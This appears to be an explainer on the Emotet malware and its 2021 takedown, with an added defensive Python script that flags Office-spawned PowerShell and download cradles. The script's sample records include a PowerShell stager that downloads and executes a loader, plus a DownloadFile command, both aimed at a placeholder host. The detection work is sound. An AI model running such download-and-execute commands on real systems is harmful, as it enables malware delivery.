An international effort by law enforcement agencies led to the takedown of the notorious malware strain.
Emotet (also known as Heodo) was first detected in 2014. For the last seven years it has been one of the most infamous pieces of malware, infecting businesses and individuals alike.
At its genesis in 2014, Emotet operated as a banking Trojan: it was engineered to infect hosts and harvest online banking credentials. It was seen initially against Germany's banking sector, before the group behind the malware, tracked as Mealybug, began targeting Swiss bank customers as well.
Over the course of these attacks, Emotet began to show signs of evolution; Mealybug had improved on the initial design. Emotet was now also capable of DDoS and malicious spam and, crucially, its loader had been split out into a separate module.
This meant that Emotet was no longer tied to a single payload: once it had a foothold on a system, the operators could use it to deliver whatever malware they chose.
The most notable cargo since then has been the TrickBot botnet and UmbreCrypt ransomware.
Emotet Infection Methodology
Like many attacks, an Emotet infection begins with email. The message sent to the target either contains a link to download a malicious document or carries the document as an attachment. Once the document is opened, Emotet has two components: its primary component and an anti-analysis module. Defending against malware often depends on reverse engineering it, and Mealybug were aware of this. The anti-analysis module fires first, running multiple checks to detect whether the host is a security researcher's analysis machine or sandbox.
Once Emotet has confirmed that it is not, it deploys the main component. This runs through JavaScript or PowerShell and downloads the Trojan, which delivers a packed payload to the host. At this stage Emotet can move around the machine's directories and obfuscate itself. It can download further malware from the attacker's server, or relay any information it has gathered back to it. Crucially, it can download and apply updates not only for itself but for whatever other malware it has brought on board.
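The chain described above (lure document opened in an Office application, a script host such as PowerShell launched from it, the loader fetched from the attacker's server) is exactly the parent/child relationship an endpoint detection looks for. The script below is an added example, not code from the original page or from any vendor or the Emotet operators: it triages constructed process-creation records (field names modelled on Sysmon's process-creation event; the log lines, file paths and URL are hypothetical placeholders) and flags an Office parent spawning a script host, an encoded PowerShell command (which it decodes before inspecting) and common download cradles. The process-name lists and regular expressions are assumptions chosen for the example, not a complete rule set.

```python
"""Triage process-creation records for the Office -> script host -> download chain.

Added example: every record in SAMPLE_EVENTS is hand-constructed, not real telemetry.
"""
import base64
import ntpath
import re

# Assumed process names: Office applications that open the lure, and the script
# hosts the macro typically launches to fetch the loader.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe"}

# Download-cradle markers, matched against both the raw command line and the
# decoded -EncodedCommand payload.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|bitsadmin|invoke-expression|\biex\b", re.I)

# PowerShell's -e/-ec/-enc/-EncodedCommand flag followed by a base64 blob.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_powershell_encoded(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def parse_event(line):
    """Parse one tab-separated Key=Value record into a dict (value may contain '=')."""
    fields = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value
    return fields


def triage_event(event):
    """Return the list of reasons this process-creation event looks like the Emotet chain."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawned_script_host:{parent}->{image}")
    decoded = decode_powershell_encoded(cmdline)
    if decoded:
        reasons.append("encoded_powershell_command")
    if DOWNLOAD_CRADLE.search(cmdline) or DOWNLOAD_CRADLE.search(decoded):
        reasons.append("download_cradle")
    return reasons


def analyse(lines):
    """Run triage over every record; return alerts as {line, reasons} dicts."""
    alerts = []
    for n, line in enumerate(lines, 1):
        reasons = triage_event(parse_event(line))
        if reasons:
            alerts.append({"line": n, "reasons": reasons})
    return alerts


# Constructed sample: a hypothetical stager, encoded the way PowerShell's
# -EncodedCommand expects (UTF-16LE, then base64).  The URL is a placeholder.
STAGER_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader')"
ENCODED_STAGER = base64.b64encode(STAGER_PLAINTEXT.encode("utf-16le")).decode()

OFFICE = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_EVENTS = [
    # 1: user opens the lure; benign on its own
    f"ParentImage=C:\\Windows\\explorer.exe\tImage={OFFICE}\tCommandLine=\"WINWORD.EXE\" /n invoice_0417.doc",
    # 2: Office spawning its print helper; not a script host, must not alert
    f"ParentImage={OFFICE}\tImage=C:\\Windows\\splwow64.exe\tCommandLine=C:\\Windows\\splwow64.exe 12288",
    # 3: the macro launches hidden, encoded PowerShell that fetches the loader
    f"ParentImage={OFFICE}\tImage={PS}\tCommandLine=powershell -w hidden -nop -enc {ENCODED_STAGER}",
    # 4: ordinary admin PowerShell; must not alert
    f"ParentImage=C:\\Windows\\System32\\cmd.exe\tImage={PS}\tCommandLine=powershell Get-ChildItem C:\\Users",
    # 5: a plain-text download cradle outside Office; still worth an alert
    f"ParentImage=C:\\Windows\\System32\\cmd.exe\tImage={PS}\tCommandLine=powershell -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe','C:\\Users\\Public\\x.exe')\"",
]

if __name__ == "__main__":
    for alert in analyse(SAMPLE_EVENTS):
        print(f"line {alert['line']}: {', '.join(alert['reasons'])}")
```

Record 3 produces all three reasons, record 5 only the cradle, and records 1, 2 and 4 produce nothing; the Office-to-PowerShell relationship is the highest-confidence signal here because legitimate documents rarely need a script host at all.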
As stated, Emotet could download and execute any malicious package; however, the most common modules were:
- Banking Module: intercepts the host's network traffic to steal banking credentials. This was the original and most commonly used module, and the one that gave Emotet its reputation.
- Email Module: accesses the host's email account and reads its contents.
- Browser Module: scans the browser for stored data, including saved passwords.
- DDoS Module: makes the host part of a botnet used for DDoS attacks.
Worldwide Propagation
As Emotet grew more capable, it spread beyond Europe and across the world. In 2017, Mealybug began coordinating Emotet attacks against targets in China, the UK, Canada and Mexico. From mid-2018 onward, its primary target has been the United States.
In its statement, the FBI said that "Emotet hit nearly every sector within the U.S.—paralyzing school systems, small and large businesses, non-profits, government services, and individuals… Emotet did not discriminate".
The cost of infection was high, with remediation costing local, state, tribal and territorial governments up to $1 million per incident.
International Takedown
On 27 January 2021, the European Union Agency for Law Enforcement Cooperation (Europol) announced that Operation Ladybird, the operation that aimed to bring down Emotet and neuter it, had been successful.
The method of the takedown was unique, to say the least.
Ukrainian police raided Emotet operators and seized their systems.
With those systems in hand, law enforcement worked through Emotet's hierarchical infrastructure and took control of it from the inside: traffic that would have been redirected to servers controlled by Mealybug was instead sent to servers controlled by law enforcement agencies.
There are 45,000 infected hosts in the US and many more worldwide. These now carry a harmless version of Emotet that communicates only with servers under law enforcement control.